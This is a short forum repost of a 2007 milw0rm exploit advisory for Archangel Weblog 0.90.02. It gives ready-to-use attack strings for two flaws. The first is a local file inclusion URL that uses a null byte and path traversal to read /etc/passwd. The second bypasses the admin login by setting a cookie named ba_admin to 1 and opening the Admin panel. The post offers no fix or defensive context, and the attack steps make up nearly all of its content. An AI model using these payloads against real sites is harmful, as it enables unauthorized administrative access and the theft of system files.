Archangel Weblog 0.90.02 LFI / Admin Bypass Vulns

Ras · May 6, 2007

                      \\\|///
                    \\  - -  //
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  Archangel Weblog version 0.90.02
	      Home     :  [url]http://www.archangelmgt.com/weblog.shtml[/url]
              Download :  [url]http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip[/url]
	      Author   :  Dj7xpl / [email]Dj7xpl@2600.ir[/email]
	      HomePage :  [url]http://Dj7xpl.2600.ir[/url]
	      Type     :  Local File Inclusion & Login Page Bypass By Cookie
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/



+---------------------------------------------------------------------------------------------+

Local File Include :

[url]http://[TARGET]/[/url][PATH]/index.php?index=[Local File]%00
[url]http://Target.com/blog/index.php?index=../../../../etc/passwd%00[/url]

+---------------------------------------------------------------------------------------------+


+---------------------------------------------------------------------------------------------+

Edit Cookie :

Host  : Target
Name  : ba_admin
Value : 1      <------ (Admin User Id)

And Go To Admin Panel :

[url]http://[Target]/[/url][Path]/Admin/

+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-05-05]

Sign In

Archangel Weblog 0.90.02 LFI / Admin Bypass Vulns

Recommended Posts

Ras

Link to comment

Share on other sites

Join the conversation

Browse

Activity

Pages